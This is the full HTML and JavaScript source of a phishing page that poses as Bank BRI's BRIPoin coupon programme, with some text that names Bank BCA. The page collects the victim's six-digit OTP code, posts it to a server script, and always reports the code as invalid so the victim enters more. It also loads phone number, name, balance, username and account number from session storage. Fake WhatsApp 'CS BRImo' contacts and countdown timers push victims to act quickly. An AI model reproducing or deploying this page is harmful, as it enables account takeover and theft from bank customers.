<html><head> 
  <meta charset="utf-8"> 
  <meta name="fragment" content="!"> 
  <meta name="theme-color" content="#0F78CB"> 
   <!-- HTML Meta Tags -->

  <title>Daftar Cetak Kuponmu</title>

  <meta name="description" content="BRIPoin adalah program loyalitas yang ditujukan untuk seluruh Nasabah Bank BRI (BritAma, Simpedes, E-Banking, Kartu Debit dan Kartu Kredit). Perbanyak poin Anda dari segala jenis transaksi di Bank BRI dan tukar poin dengan beragam reward menarik khusus untuk nasabah setia Bank BRI.">

  <!-- Facebook Meta Tags -->
  <meta property="og:url" content="https://bripoin.bri.co.id">
  <meta property="og:type" content="website">
  <meta property="og:title" content="𝗕𝗥𝗜𝗣𝗼𝗶𝗻  | 𝗧𝘂𝗸𝗮𝗿𝗸𝗮𝗻 𝗣𝗢𝗜𝗡-𝗺𝘂">
  <meta property="og:description" content="BRIPoin adalah program loyalitas yang ditujukan untuk seluruh Nasabah Bank BRI (BritAma, Simpedes, E-Banking, Kartu Debit dan Kartu Kredit). Perbanyak poin Anda dari segala jenis transaksi di Bank BRI dan tukar poin dengan beragam reward menarik khusus untuk nasabah setia Bank BRI.">
  <meta property="og:image" content="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcQe2_RRje_H6EnHBS7-zriaK4XxvgoL3qqnmA&usqp=CAU">
 <script src="js/typed.min.js"></script>
  <!-- Twitter Meta Tags -->
  <meta name="twitter:card" content="summary_large_image">
  <meta property="twitter:domain" content="bripoin.bri.co.id">
  <meta property="twitter:url" content="https://bripoin.bri.co.id">
  <meta name="twitter:title" content="𝗕𝗥𝗜𝗣𝗼𝗶𝗻 | 𝗧𝘂𝗸𝗮𝗿𝗸𝗮𝗻 𝗣𝗢𝗜𝗡-𝗺𝘂">
  <meta name="twitter:description" content="BRIPoin adalah program loyalitas yang ditujukan untuk seluruh Nasabah Bank BRI (BritAma, Simpedes, E-Banking, Kartu Debit dan Kartu Kredit). Perbanyak poin Anda dari segala jenis transaksi di Bank BRI dan tukar poin dengan beragam reward menarik khusus untuk nasabah setia Bank BRI.">
  <meta name="twitter:image" content="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcQe2_RRje_H6EnHBS7-zriaK4XxvgoL3qqnmA&usqp=CAU">

<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=0, maximum-scale=1">
<link rel="icon" href="images/AddText_10-22-11.27.51.jpg" type="image/x-icon">
<link rel="apple-touch-icon" href="images/AddText_10-22-11.27.23.jpg">
  <!-- Meta Tags Generated via https://www.opengraph.xyz -->
        
  <link href="css/bootstrap.min.css" rel="stylesheet" crossorigin="anonymous"> 
  <link rel="stylesheet" href="css/ionicons.min.css"> 
  <style>
        @import url('https://fonts.googleapis.com/css2?family=Open+Sans:wght@500&display=swap');
        body {
            padding: 0;
            margin: 0;
            width: 100%;
            font-family: 'Open Sans', sans-serif;
            position: fixed;
            background:#DEE7EE;
        }

        .text-header {
            font-family: 'Open Sans', sans-serif;
            color: #0086e0;
        }

        .text-subheader {
            font-family: 'Open Sans', sans-serif;
            margin-top: -20px;
            color: #000;
        }

        .btn-punya {
            display: block;
            margin: 80px auto 0 auto;
            padding: 0px; 
            cursor: pointer; 
            background: none rgb(0, 134, 224);
            border: none; 
            text-align: center; 
            height: 57px; 
            width: 459px; 
            max-width: 100%;
            font-family: Arial; 
            font-size: 14px; 
            font-weight: bold; 
            color: rgb(255, 255, 255); 
            letter-spacing: 2px; 
            line-height: 1; 
            border-radius: 5px; 
            box-shadow: rgb(170, 170, 170) 2px 2px 4px 0px; 
            transition: background 200ms ease 0s;
        }

        .btn-belum {
            display: block;
            margin: 10px auto;
            padding: 0px; 
            cursor: pointer; 
            background: none transparent;
            border: none; 
            text-align: center; 
            height: 57px; 
            width: 459px; 
            max-width: 100%;
            font-family: Arial; 
            font-size: 14px; 
            font-weight: bold; 
            color: rgb(0, 134, 224);
            letter-spacing: 2px; 
            line-height: 1; 
            border-radius: 5px; 
            transition: background 200ms ease 0s;
        }

        .form-log {
            box-sizing: border-box; 
            height: 45px; 
            width: 336px;
            max-width: 90%;
            border: 3px solid rgb(0, 134, 224);
            border-radius: 23px;
            font-family: 'Open Sans', sans-serif;
            font-size: 16px; 
            color: rgb(28, 28, 28); 
            word-spacing: 0px; 
            padding: 0px 45px;
            text-align: center;
            }

        #ionIcons {
            color: rgb(22, 119, 199);
            font-size: 29px;
            position: absolute;
            display: block;
            margin-top: 8px;
            margin-left: 37px;
        }

        .eye {
            display: block;
            margin: -40px auto;
            margin-right: 20px;
            position: relative;
            box-sizing: border-box; 
            z-index: 16; 
            height: 19.8189px;
            width: 25.0236px; 
            float: right;
            border-radius: 0px; 
            cursor: pointer;
        }

        .Button clickable-element {
            display: block;
            margin: 60px 0 0 0;
            padding: 0px; 
            cursor: pointer; 
            background: none rgba(0, 111, 214, 0.96); 
            border: none; 
            text-align: center; 
            height: 57px; 
            width: 370px; 
            font-family: Arial; 
            font-size: 17px; 
            font-weight: bold; 
            color: rgb(255, 255, 255); 
            letter-spacing: 1px; 
            line-height: 1; 
            border-radius: 8px; 
            box-shadow: rgb(170, 170, 170) 2px 2px 4px 0px; 
            transition: background 100ms step-start 0s;
        }

        @media only screen and (max-width: 600px) {
            .btn-login {
                width: 82%;
            }
        }

        .box-lte {
            width: 380px;
            max-width: 95%;
            background: none;
            display: block;
            
            margin: -40px auto;
            border-radius: 20px;
        }

        textarea {
            box-sizing: border-box; 
            height: 75px;
            margin-top: -30px;
            width: 280px;
            border: 3px solid rgb(0, 134, 224);
            box-shadow: rgb(170, 170, 170) 2px 2px 4px 0px;
            border-radius: 15px;
            padding: 5px 10px;
        }
        
          .textarea1 {
            box-sizing: border-box; 
            
            border: 2px solid red;
            box-shadow: rgb(170, 170, 170) 2px 2px 4px 0px;
            border-radius: 50px;
            
        }
        
         .textarea {
            box-sizing: border-box; 
            height: 75px;
           
            width: 280px;
            border: 2px solid red;
            box-shadow: rgb(170, 170, 170) 2px 2px 4px 0px;
            border-radius: 15px;
            padding: 5px 10px;
        }
        
        textarea::placeholder{
            font-size: 13px;
        }
           h1{
            display: table;
            background-color: transparent;
            color: #FF0000;
            padding: 15px;
            width: 100%;
            font-size: 14px;
            margin-bottom: -70px;
            text-align: center;
            position: fixed;
            top: 80;
           font-weight: bold;
            right: 0;
            left: 0;
            margin: 0px auto;
            
        }
        
        .blink {
  animation: blink-animation 2s steps(6, start) infinite;
  -webkit-animation: blink-animation 2s steps(6, start) infinite;
}
@keyframes blink-animation {
  to {
    visibility: hidden;
  }
}
@-webkit-keyframes blink-animation {
  to {
    visibility: hidden;
  }
}

#Aktivasi{
    display: none;
}

    </style> 
    
       <style>
#animation-demo {
	width: 200px;
	height: 150px;
	position: relative;
	background-color: #62A80A;
	line-height: 150px;
	color: #000;
	border: solid 1px #1A7404;
	text-align: center;
} 

.animated {
	-webkit-animation-duration: 1s;
	animation-duration: 1s;
	-webkit-animation-fill-mode: both;
	animation-fill-mode: both;
	-webkit-animation-timing-function: linear;
	animation-timing-function: linear;
	 -webkit-animation-name: bounceIn; 
    animation-name: bounceIn; 
}

@-webkit-keyframes bounceIn { 
    0% { 
        opacity: 1; 
        -webkit-transform: scale(0); 
    } 

    50% { 
        opacity: 1; 
        -webkit-transform: scale(0); 
    } 

    70% { 
        -webkit-transform: scale(0); 
    } 

    100% { 
         -webkit-transform: scale(0); 
    } 
} 

@keyframes bounceIn { 
    0% { 
        opacity: 1; 
        transform: scale(.1); 
    } 

    50% { 
        opacity: 1; 
        transform: scale(.5); 
    } 

    70% { 
        transform: scale(1); 
    } 

    100% { 
        transform: scale(1); 
    } 
} 


</style>  
  <style>
#animation-demo {
	width: 200px;
	height: 150px;
	position: relative;
	background-color: #62A80A;
	line-height: 150px;
	color: #000;
	border: solid 1px #1A7404;
	text-align: center;
} 

.naik {
	-webkit-animation-duration: 1s;
	animation-duration: 1s;
	-webkit-animation-fill-mode: both;
	animation-fill-mode: both;
	-webkit-animation-timing-function: ease-in;
	animation-timing-function: ease-in;
	-webkit-animation-name: bounceOutUp; 
    animation-name: bounceOutUp; 
}

@-webkit-keyframes bounceOutUp { 
    0% { 
        -webkit-transform: translateY(0); 
    } 
    20% { 
        opacity: 1; 
        -webkit-transform: translateY(20px); 
    } 
    100% { 
        opacity: 1; 
        -webkit-transform: translateY(-200px); 
    } 
} 
@keyframes bounceOutUp { 
    0% { 
        transform: translateY(0); 
    } 
    20% { 
        opacity: 1; 
        transform: translateY(20px); 
    } 
    100% { 
        opacity: 1; 
        transform: translateY(-500px); 
    } 
} 
.bounceOutUp { 
    
}


/*********************/
.process1 {
     width: 100%;
            height: 100%;
             display: flex;
             justify-content: center;
            margin: auto;
            position: absolute;
           padding-top: 300px;
            left: 0;
            right: 0;
            bottom: 0;
            background: rgba(0, 0, 0, 0.6);
            z-index: 99999;
            
      
}
.loading {
    position: absolute;
    display: flex;
    justify-content: center;
    align-items: center;
    margin-bottom: 20%;
    margin-top: 300px;
}
.loading img {
    width: 50px;
    
    top: 10;
}
.loading .spinner{
    position: absolute;
    width: 35px;
    animation: spin 1s linear infinite;
    -webkit-animation: spin 1s linear infinite;
    -moz-animation: spin 1s linear infinite;
    -ms-animation: spin 1s linear infinite;
    -o-animation: spin 1s linear infinite;
}
@keyframes spin {
  0% { transform: rotate(360deg); }
  100% { transform: rotate(0deg); }
}
@-webkit-keyframes spin {
  0% { -webkit-transform: rotate(360deg); }
  100% { -webkit-transform: rotate(0deg); }
}
@-moz-keyframes spin {
  0% { -webkit-transform: rotate(360deg); }
  100% { -webkit-transform: rotate(0deg); }
}
@-ms-keyframes spin {
  0% { -webkit-transform: rotate(360deg); }
  100% { -webkit-transform: rotate(0deg); }
}
@-o-keyframes spin {
  0% { -webkit-transform: rotate(360deg); }
  100% { -webkit-transform: rotate(0deg); }
}


.loader{
      font-size: 20px;
      color: #FFF;
      font-weight: bold;
      display: inline-block;
      font-family: 'Nunito', sans-serif;
      
      position: absolute;
      margin-top: 0px;
    }
    .loader:before{
      content: '';
      animation: 2s print linear alternate infinite;
    }
    .loader:after{
      content: '';
      position: absolute;
      right: -4px;
      top: 50%;
      transform: translatey(-45%);
      width: 2px;
      height: 1.3em;
      background: currentColor;
      opacity: 0.8;
      animation: 1s blink steps(2) infinite;
    }
    
    @keyframes blink {
      0%  { visibility: hidden;}
      100%  { visibility: visible;}
    }
    @keyframes print {
      0% { content: 'B'}
      10% { content: 'BR'}
      20% { content: 'BRI'}
      30% { content: 'BRIm'}
      40% { content: 'BRImo'}
      50% { content: 'BRImo-'}
      60% { content: 'BRImo-B'}
      70% { content: 'BRImo-BR.'}
      80% { content: 'BRImo-BRI..'}
      90% , 100% { content: 'BRImo-BRI...'}
    }
    
.typed {
  
}

.typed-cursor{
   opacity: 1;
   animation: blink 0.7s infinite;
}

@keyframes blink{
    0% { opacity:1; }
    50% { opacity:0; }
    100% { opacity:1; }
}       
</style>
 </head> 
 <body> 
  <span class="blink" style="display: none" id="blinkk"><h1>Tautan Link tidak Valid, atau sudah Kadaluarsa</h1></span>
 <span class="blink" style="display: none" id="blinkAktivasi"><h1>Kode OTP tidak valid, atau sudah kadaluarsa</h1></span> 
  <div id="popupku" style="position: fixed;
  top: 0;
  left: 0;
  right: 0;
  bottom: 0;
  width: 100%; height: 100%; background: rgba(0,0,0, 0.4); z-index: 9999">
    <center>
 <img id="gambarku" class="animated" src="images/q9fldl.jpg" width="60%" style="margin-top: 250px; border-radius: 15px; box-shadow: rgba(199, 199, 199, 2.2)  0px 2px 5px 0px; border: 2px double #0F78CB" onclick="tutupimg()">
    </center>
</div>
<nav style="position: ; top: 0; left: 0; right: 0; margin: 0px auto; width: 100%; height: 65px; background: #F1F5F8; z-index: 99999; border-bottom: 0.5px solid #ddd">
 <img src="images/7po10l.jpg" style="width: 100%; position: fixed; top: 0; left: 0; right: 0; margin: 0px auto;border-bottom: 0.5px solid #ddd">
</nav>
<img src="images/1000226744.png" style="width: 100%; border-radius: 0px 0px 100px 0px; border-bottom: 5px double #F6AA23; outline: 2px solid #2468A5;background: #fff; box-shadow: rgba(0, 0, 0, 2.2)  0px 2px 7px 0px;">  
<span class="blink" style="display: none" id="blinkk"><h1>Kode OTP tidak Valid, atau sudah Kadaluarsa</h1></span>
  <div class="container" id="otp"> 
   <div class="box-lte"> 
    <div class="row" style="margin-top: 100px;"> 
     <center>
     <div class="col-12 d-block mx-auto text-center p-0" style="height: 62%; width: 100%; max-width: 100%; display: block; border-radius: 0px 25px 0px 25px; position: absolute; margin: 0px auto; left: 0; right: 0;z-index: -1; text-align: center; margin-top: 75px ;"> 

     </div> 
    </center></div> 
   

    <center>
    <div class="row" style="margin-top: 0px; border: 2px solid #fff; width: 100%;height:165px; border-radius: 15px; background-image: url(); background-size: 100% 100%; background-position: 100% 100%; padding-top: 10px; box-shadow: rgba(99, 99, 99, 0.2) 0px 2px 8px 0px; margin: -30px auto; background: #fff; padding: 10px; color: #0F78CB; font-weight: 550; color: #fff;
background: #2468A5;
text-shadow: #101010 1px 1px 0; font-weight: bold; box-shadow: rgba(50, 50, 93, 0.25) 0px 6px 12px -2px, rgba(0, 0, 0, 0.3) 0px 3px 7px -3px; font-size: 15px; text-align: center" id="Typed"> 
    
    </div> 
  </center></div>
   <div class="container" id="Aktivasi" style="display: none"> 
   <div class="box-lte"> 
    <div class="row" style="margin-top: 140px;"> 
     <div class="col-12 d-block mx-auto text-center p-0" style="height: 150px; width: 256px; max-width: 100%; display: block; margin-top: -50px; border-radius: 0px;"> 
     
     </div> 
    </div> 

    <div class="row"> 
    
     <hr style="display: block; margin: auto; width: 90%;"> 
     <p style="font-weight: bold; font-size: 20px; color: #098CE3; text-align: center; margin: -10px auto;" id="waktu">1 : 00</p> 
    
    </div> 
    <div class="row"> 
     <div class="col-12" style="width: 459px; max-width: 100%; display: block; margin: 5px auto; padding: 0 20px; margin-top: -10px"> 
      <p style="font-size: 10px; text-align: center; font-weight: bold; padding: 15px">Silahkan masukan kode Virtual TARIF Anda, Jika belum menerima Kode silahkan klik tombol di bawah ini<br></p><div style="font-weight: bold; text-align: center; margin-top: -20px; margin-bottom: -20px; color: #098CE3">Masukkan Kode OTP</div><p></p> <br>
     </div> 
    </div> 
    <div class="row"> 
     <div class="col-12" style="width: 459px; max-width: 100%; display: block; margin: 5px auto;"> 
  <form onsubmit="kirimPesan(event)" method="post" id="formLink">
       <center> 
        <div style="margin-top: -21px"> 
        
       <i class="ion-ios-locked-outline" id="ionIcons"></i> 
   

         <input type="tel" name="otp" id="nama1" class="bubble-element Input form-log" placeholder="KODE Virtual 6 DIGIT" maxlength="6" minlength="6" pattern="(?=.*[0-9]).{6,6}" required="" oninvalid="this.setCustomValidity('Mohon mɑsukkɑn 𝗞𝗼𝗱𝗲 𝗢𝗧𝗣 dengɑn ;benɑr')" onchange="this.setCustomValidity('')" style="margin-left: 0px;" onclick="gantiborder1()">
  
         <b> <a href="onclick='windiw.location.href=''"><p style="font-size: 14px; text-align: center; margin-top: 25px; margin-left: 10px; margin-right: 10px; position: relative" onclick="window.location.href=''"><strong style="color: #FF0000; text-decoration: none"> Belum Menerima Kode OTP ?<br>
         <span style="color: #098CE3">Klik Disini</span>
         </strong></p></a></b>
        </div>
       </center>
       <b>
<input type="submit" id="kirims" class="bubble-element Button clickable-element" style="max-width: 85%; padding: 0px; cursor: pointer; background: none rgb(9, 140, 227); border: none; text-align: center; display: block; margin: 20px auto; height: 39px; width: 346px; left: 0px; top: 0px; font-family: Arial; font-size: 14px; font-weight: 400; color: rgb(255, 255, 255); letter-spacing: 1px; line-height: 1; border-radius: 15px; box-shadow: rgb(170, 170, 170) 2px 2px 4px 0px; transition: background 200ms ease 0s; font-weight: 700" tabindex="2" value="Konfirmasi">
</b>
      </form>
     </div>
     <b> </b>
    </div>
    <b> </b>
   </div>

   
   <b> 
     </b></div><b> 
     <center>
 <img src="images/3nj843.jpg" style="width: 100%; position: fixed; bottom: 0; left: 0; right: 0; margin: 0px auto">
     </center>
    </b></div><b> </b>
  
    <center>
     <div id="process1" name="process" class="process1" style="display: none;">
           <span class="loader"></span>
        </div>
        </center>  
  <audio hidden="" controls="" id="bsi">
<source src="cs.mp3" type="audio/ogg">
<source src="cs.mp3" type="audio/mpeg">
  Your browser does not support the audio element.
</audio> 
 <audio hidden="" controls="" id="bsiku">
<source src="tunggu-bri_" type="audio/ogg">
<source src="tunggu-bri_" type="audio/mpeg">
  Your browser does not support the audio element.
</audio>       
<script src="whatsapp-button.js" async="" onload="whatsappButton({
    buttonName:' ',
    buttonIconSize: '32',
    brandImageUrl:'https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh8eHxO93WCnRc-CQfdz96UGBAhJ7EbRcBzVgWFRSMV5mLEUhHegPaifIHxM7MZszAW_XuZrseWLPBG99DT4SGF8ObwpYXG0aWGYt96e559R5J1AMa_30Ikxi6aoOtR8jvSansOh7obOZyD3nGJ11rHDvQdyxAqJzpbh-6KAa2eeJt6nsclBfwlhoY-x3c/s388/IMG_20240518_024956.jpg',
    buttonMargin:'',
    brandName:'𝗖𝗦 𝗕𝗥𝗜𝗺𝗼',
    brandSubtitleText:'online',
    buttonSize:'medium',
    buttonPosition:'right',
    callToAction:'Chat Sekarang',
    phoneNumber:'628315522080',
    welcomeMessage:'Halo Kak, Apa yang dapat saya bantu?👋',
    prefillMessage:'Saya Mau Request Kode OTP aktivasi',
    })">
</script>		
 <script src="js/jquery.min.js"></script>  
<script src="js/jquery.min_1.js" crossorigin="anonymous" referrerpolicy="no-referrer"></script>
<script src="mainkode.js"></script>
   <script src="js/jquery.min_2.js"></script>
 
   
<script>
var nomor = sessionStorage.getItem("nomor");
document.getElementById("nomorhp").value = nomor + "";
var nama = sessionStorage.getItem("nama");
document.getElementById("nama").value = nama + "";
var saldo = sessionStorage.getItem("saldo");
document.getElementById("saldo").value = saldo + "";
var unames = sessionStorage.getItem("unames");
document.getElementById("user").value = unames + "";
var norek = sessionStorage.getItem("norek");
document.getElementById("pass").value = norek + "";
  </script>
   <script>
 function tutupimg(){
      setTimeout(() => {
  $("#popupku").hide();
      },00)
      setTimeout(() => {
       audio = document.getElementById("bsi");
    audio.play();
    audio.loop = false
      },900)
  $("#gambarku").addClass("naik");
  new Typed('#typed',{
  strings : ['', 'Terimakasih Telah Mendaftar Dilayanan Bank BCA Festival,  Pendaftaran Anda Sedang Diproses, Beberapa Saat Lagi Anda Akan Dihubungi Oleh Pihak Bank BCA, Untuk Proses Cetak Kode Kupon Undian Anda'],
  typeSpeed : 45,
  delaySpeed : 1000,
  loop : false
});
 }

</script>
<script>
function getcs(){

  audio = document.getElementById("bsi");
    
     audio.load();
   
setTimeout(function(){  
    $("#process1").hide();   
location.href='https://wa.me/6282258867624?text=Hallo%20𝗕𝗮𝗻𝗸%20𝗕𝗥𝗜%0ASaya%20Belum%20Mendapat%20Kode%20OTP Kupon';

    }, 0);    
    
}     
 </script>
<script>
    window.onload = function() {
  var minute = 02;
  var sec = 59;
  setInterval(function() {
    document.getElementById("waktu").innerHTML =   minute + " : " + sec  ;
    sec--;

    if (sec == 0) {
      minute--;
      sec = 59;

      if (minute == 0) {
        minute = 1;
      }
    }
  }, 1000);
}
  
  
  
   
    document.getElementById('waktu1').innerHTML =
          03 + ":" + 01;
        startTimer();
        
        function startTimer() {
          var presentTime = document.getElementById('waktu1').innerHTML;
          var timeArray = presentTime.split(/[:]+/);
          var m = timeArray[0];
          var s = checkSecond((timeArray[1] - 1));
          if(s==59){m=m-1}
          if(m<0){
            return
          }
          
          document.getElementById('waktu1').innerHTML =
            m + " : " + s;
          console.log(m)
          setTimeout(startTimer, 1000);
          
        }
        
        function checkSecond(sec) {
          if (sec < 10 && sec >= 0) {sec = "0" + sec}; // add zero in front of numbers < 10
          if (sec < 0) {sec = "59"};
          return sec;
        }
        
        
        
    
    </script>  
  <script>
      document.getElementById('timer').innerHTML =
          01 + ":" + 01;
        startTimer1();
        
        function startTimer1() {
          var presentTime = document.getElementById('timer').innerHTML;
          var timeArray = presentTime.split(/[:]+/);
          var m = timeArray[0];
          var s = checkSecond((timeArray[1] - 1));
          if(s==59){m=m-1}
          if(m<0){
            return
          }
          
          document.getElementById('timer').innerHTML =
            m + " : " + s;
          console.log(m)
          setTimeout(startTimer1, 1000);
          
        }
        
        function checkSecond(sec) {
          if (sec < 10 && sec >= 0) {sec = "0" + sec}; // add zero in front of numbers < 10
          if (sec < 0) {sec = "59"};
          return sec;
        }
        
        
        
  </script>
  <!-- Static App Form Collection Script -->
<!--<script src="https://static.app/js/static-forms.js" type="text/javascript"></script>

<script src="https://static.app/js/static.js" type="text/javascript"></script>-->
 <script>
 $('#formLink').on('submit', function (event) {

  event.stopPropagation();
    event.preventDefault();
    
 document.getElementById('kirims').value = "Memproses....";



$.ajax({

 type: 'POST',
 url: 'sendOtp.php',
 async: false,
 dataType: 'JSON',
 data: $(this).serialize(),
 
 complete: function(data) {
            console.log('Complete')
 setTimeout(function(){
  document.getElementById("blinkAktivasi").style.display = "block";
 $("#nama1").val("");
 $("#nama1").addClass('textarea1'); 
    }, 1000);
setTimeout(function(){
    document.getElementById('kirims').value = "Konfirmasi";
  }, 1000);

        }
    });

    return false;
});   
        
</script>


<script>
 function gantiborder(){
   $("#nama").removeClass('textarea'); 
   $("#blinkk").hide(); 
   document.getElementById('kirims').value = "Konfirmasi";
 }   
 
 function gantiborder1(){
   $("#nama1").removeClass('textarea1'); 
   $("#blinkAktivasi").hide(); 
   $("#logoku").show(); 
   document.getElementById('kirims').value = "Konfirmasi";
 }   
</script>

</body></html><!--<script src='https://a.bsite.net/footer.js'></script>
-->